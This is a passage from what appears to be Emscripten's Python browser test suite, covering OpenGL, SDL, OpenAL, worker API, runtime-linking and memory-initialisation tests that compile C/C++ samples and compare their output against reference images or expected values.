# (Path('third_party/glbook/Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), test_file('third_party/glbook/CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(Path('third_party/glbook/Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), test_file('third_party/glbook/CH09_TextureWrap.png')),
# (Path('third_party/glbook/Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), test_file('third_party/glbook/CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(Path('third_party/glbook/Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), test_file('third_party/glbook/CH09_SimpleTexture2D.png')),
(Path('third_party/glbook/Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), test_file('third_party/glbook/CH10_MultiTexture.png')),
(Path('third_party/glbook/Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), test_file('third_party/glbook/CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + test_file('third_party/glbook/Common'),
test_file('third_party/glbook/Common/esUtil.c'),
test_file('third_party/glbook/Common/esShader.c'),
test_file('third_party/glbook/Common/esShapes.c'),
test_file('third_party/glbook/Common/esTransform.c'),
'-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'] + args)
@requires_graphics_hardware
def test_clientside_vertex_arrays_es3(self):
self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-sFULL_ES3=1', '-sUSE_GLFW=3', '-lglfw', '-lGLESv2'])
def test_emscripten_api(self):
self.btest_exit('emscripten_api_browser.c', args=['-sEXPORTED_FUNCTIONS=_main,_third', '-lSDL'])
def test_emscripten_api2(self):
def setup():
create_file('script1.js', '''
Module._set(456);
''')
create_file('file1.txt', 'first')
create_file('file2.txt', 'second')
setup()
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
self.btest_exit('emscripten_api_browser2.c', args=['-sEXPORTED_FUNCTIONS=_main,_set', '-sFORCE_FILESYSTEM'])
# check using file packager to another dir
self.clear()
setup()
ensure_dir('sub')
self.run_process([FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
shutil.copyfile(Path('sub/test.data'), 'test.data')
self.btest_exit('emscripten_api_browser2.c', args=['-sEXPORTED_FUNCTIONS=_main,_set', '-sFORCE_FILESYSTEM'])
def test_emscripten_api_infloop(self):
self.btest_exit('emscripten_api_browser_infloop.cpp', assert_returncode=7)
def test_emscripten_fs_api(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') # preloaded *after* run
self.btest_exit('emscripten_fs_api_browser.c', assert_returncode=1, args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest_exit('emscripten_fs_api_browser2.c', assert_returncode=1, args=['-s', "ASSERTIONS=0"])
self.btest_exit('emscripten_fs_api_browser2.c', assert_returncode=1, args=['-s', "ASSERTIONS=1"])
@requires_threads
def test_emscripten_main_loop(self):
for args in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sEXIT_RUNTIME']]:
self.btest_exit('emscripten_main_loop.cpp', args=args)
@requires_threads
def test_emscripten_main_loop_settimeout(self):
for args in [
[],
# test pthreads + AUTO_JS_LIBRARIES mode as well
['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sAUTO_JS_LIBRARIES=0'],
]:
self.btest_exit('emscripten_main_loop_settimeout.cpp', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker(self):
for args in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]:
self.btest_exit('emscripten_main_loop_and_blocker.cpp', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker_exit(self):
# Same as above but tests that EXIT_RUNTIME works with emscripten_main_loop. The
# app should still stay alive until the loop ends
self.btest_exit('emscripten_main_loop_and_blocker.cpp')
@requires_threads
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker'], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]:
self.btest_exit('emscripten_main_loop_setimmediate.cpp', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest_exit('sdl_quit.c', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
# FIXME(https://github.com/emscripten-core/emscripten/issues/12978)
self.emcc_args.append('-Wno-deprecated-declarations')
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
# Covered by dEQP text suite (we can remove it later if we add coverage for that).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure=1', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
self.btest_exit('sdlglshader2.c', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_threads
def test_gl_textures(self):
for args in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sOFFSCREEN_FRAMEBUFFER']]:
self.btest('gl_textures.cpp', '0', args=['-lGL'] + args)
@requires_graphics_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-sGL_UNSAFE_OPTS=0', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-sGL_UNSAFE_OPTS=0', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-sGL_UNSAFE_OPTS=0', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-sGL_UNSAFE_OPTS=0', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-sGL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-sGL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328', '2411982848'], args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_regal(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre.png'), args=['-sUSE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_sync_compilation
def test_cubegeom_pre_relocatable(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '-sRELOCATABLE'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre2.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre2.png'), args=['-sGL_DEBUG', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre3(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre3.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre2.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@parameterized({
'': ([],),
'tracing': (['-sTRACE_WEBGL_CALLS'],),
})
@requires_graphics_hardware
def test_cubegeom(self, args):
# proxy only in the simple, normal case (we can't trace GL calls when
# proxied)
self.btest(Path('third_party/cubegeom', 'cubegeom.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'] + args, also_proxied=not args)
@requires_graphics_hardware
def test_cubegeom_regal(self):
self.btest(Path('third_party/cubegeom', 'cubegeom.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-DUSE_REGAL', '-sUSE_REGAL', '-lGL', '-lSDL'], also_proxied=True)
@requires_threads
@requires_graphics_hardware
def test_cubegeom_regal_mt(self):
self.btest(Path('third_party/cubegeom', 'cubegeom.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-pthread', '-DUSE_REGAL', '-sUSE_PTHREADS', '-sUSE_REGAL', '-lGL', '-lSDL'], also_proxied=False)
@requires_graphics_hardware
def test_cubegeom_proc(self):
create_file('side.c', r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os']]:
self.btest(Path('third_party/cubegeom', 'cubegeom_proc.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=opts + ['side.c', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_glew(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_glew.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '--closure=1', '-sLEGACY_GL_EMULATION', '-lGL', '-lGLEW', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_color(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_color.c'), reference=Path('third_party/cubegeom', 'cubegeom_color.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_normal.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap_far(self): # indices do nto start from 0
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far_range.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_firefox('fails on CI but works locally')
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda_quad.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda_quad.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_mt(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_mt.c'), reference=Path('third_party/cubegeom', 'cubegeom_mt.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL']) # multitexture
@requires_graphics_hardware
def test_cubegeom_color2(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_color2.c'), reference=Path('third_party/cubegeom', 'cubegeom_color2.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_texturematrix.c'), reference=Path('third_party/cubegeom', 'cubegeom_texturematrix.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_fog(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_fog.c'), reference=Path('third_party/cubegeom', 'cubegeom_fog.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre_vao.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_regal(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre_vao.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-sUSE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2_vao(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre2_vao.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre2_vao2.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre2_vao2.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_es(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre_vao_es.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-sFULL_ES2=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_u4fv_2.c'), reference=Path('third_party/cubegeom', 'cubegeom_u4fv_2.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
create_file('pre.js', '''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
create_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-sINITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-sINITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_graphics_hardware
def test_glbegin_points(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_s3tc(self):
shutil.copyfile(test_file('screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(test_file('screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-sLEGACY_GL_EMULATION', '-sGL_FFP_ONLY', '-lGL', '-lSDL'])
@no_chrome('see #7117')
@requires_graphics_hardware
def test_aniso(self):
shutil.copyfile(test_file('water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_graphics_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-sLEGACY_GL_EMULATION', '-lGL'])
def test_openal_error(self):
for args in [
[],
['-lopenal', '-sSTRICT'],
['--closure=1']
]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
def test_runtimelink(self):
create_file('header.h', r'''
struct point {
int x, y;
};
''')
create_file('supp.c', r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point *p) {
printf("supp: %d,%d\n", p->x, p->y);
mainFunc(p->x + p->y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
''')
create_file('main.c', r'''
#include <stdio.h>
#include <assert.h>
#include "header.h"
extern void suppFunc(struct point *p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
assert(x == 56);
}
int mainInt = 543;
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
suppFunc(&p);
printf("main see: %d\nok.\n", suppInt);
assert(suppInt == 76);
return 0;
}
''')
self.run_process([EMCC, 'supp.c', '-o', 'supp.wasm', '-sSIDE_MODULE', '-O2'])
self.btest_exit('main.c', args=['-sMAIN_MODULE=2', '-O2', 'supp.wasm'])
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
create_file('pre.js', '''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
def test_mem_init(self):
self.set_setting('WASM_ASYNC_COMPILATION', 0)
create_file('pre.js', '''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
create_file('post.js', '''
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
args = ['-sWASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1']
# with assertions, we notice when memory was written to too early
expected = 'abort:Assertion failed: native function `note` called before runtime initialization'
self.btest('mem_init.cpp', expected=expected, args=args)
# otherwise, we just overwrite
self.btest_exit('mem_init.cpp', args=args + ['-sASSERTIONS=0'])
def test_mem_init_request(self):
def test(what, status):
print(what, status)
create_file('pre.js', '''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
maybeReportResultToServer('got_error');
}
console.log('WARNING: ' + x);
};
''')
self.btest('mem_init_request.cpp', expected=status, args=['-sWASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
self.set_setting('EXIT_RUNTIME')
test('test.html.mem', 'exit:0')
test('nothing.nowhere', 'got_error')
def test_runtime_misuse(self):
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1: ' + e.toString());
assert(e.toString().indexOf('Assertion failed') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2: ' + e.toString());
assert(e.toString().indexOf('Assertion failed') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution
} catch(e) {
out('expected fail 3:' + e.toString());
assert(e.toString().indexOf('Assertion failed') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// Run on the next event loop, as code may run in a postRun right after main().
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 0);
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
''' % self.port
create_file('pre_runtime.js', r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [[], ['-sWASM=0']]:
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
create_file('post.js', post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-sEXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync startup, call too late')
create_file('post.js', post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '-sEXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync, runtime still alive, so all good')
create_file('post.js', post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js'] + extra_args + mode, reporting=Reporting.NONE)
def test_cwrap_early(self):
self.btest(Path('browser/cwrap_early.cpp'), args=['-O2', '-sASSERTIONS', '--pre-js', test_file('browser/cwrap_early.js'), '-sEXPORTED_RUNTIME_METHODS=[cwrap]'], expected='0')
def test_worker_api(self):
self.compile_btest([test_file('worker_api_worker.cpp'), '-o', 'worker.js', '-sBUILD_AS_WORKER', '-sEXPORTED_FUNCTIONS=_one'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
self.compile_btest([test_file('worker_api_2_worker.cpp'), '-o', 'worker.js', '-sBUILD_AS_WORKER', '-O2', '--minify=0', '-sEXPORTED_FUNCTIONS=_one,_two,_three,_four', '--closure=1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify=0'], expected='11')
def test_worker_api_3(self):
self.compile_btest([test_file('worker_api_3_worker.cpp'), '-o', 'worker.js', '-sBUILD_AS_WORKER', '-sEXPORTED_FUNCTIONS=_one'])
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
self.compile_btest([test_file('worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-sBUILD_AS_WORKER', '-sEXPORTED_FUNCTIONS=_one', '-sASYNCIFY'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_with_pthread_compilation_fails(self):
self.run_process([EMCC, '-c', '-o', 'hello.o', test_file('hello_world.c')])
stderr = self.expect_fail([EMCC, 'hello.o', '-o', 'a.js', '-g', '--closure=1', '-sUSE_PTHREADS', '-sBUILD_AS_WORKER=1'])
self.assertContained("USE_PTHREADS + BUILD_AS_WORKER require separate modes that don't work together, see https://github.com/emscripten-core/emscripten/issues/8854", stderr)
def test_emscripten_async_wget2(self):
self.btest_exit('test_emscripten_async_wget2.cpp')
@disabled('https://github.com/emscripten-core/emscripten/issues/15818')
def test_emscripten_async_wget2_data(self):
create_file('hello.txt', 'Hello Emscripten!')
self.btest('test_emscripten_async_wget2_data.cpp', expected='0')
def test_emscripten_async_wget_side_module(self):
self.run_process([EMCC, test_file('browser_module.c'), '-o', 'lib.wasm', '-O2', '-sSIDE_MODULE'])
self.btest_exit('browser_main.c', args=['-O2', '-sMAIN_MODULE=2'])
@parameterized({
'non-lz4': ([],),
'lz4': (['-sLZ4'],)
})
def test_preload_module(self, args):
create_file('library.c', r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
self.run_process([EMCC, 'library.c', '-sSIDE_MODULE', '-O2', '-o', 'library.so'])
create_file('main.c', r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
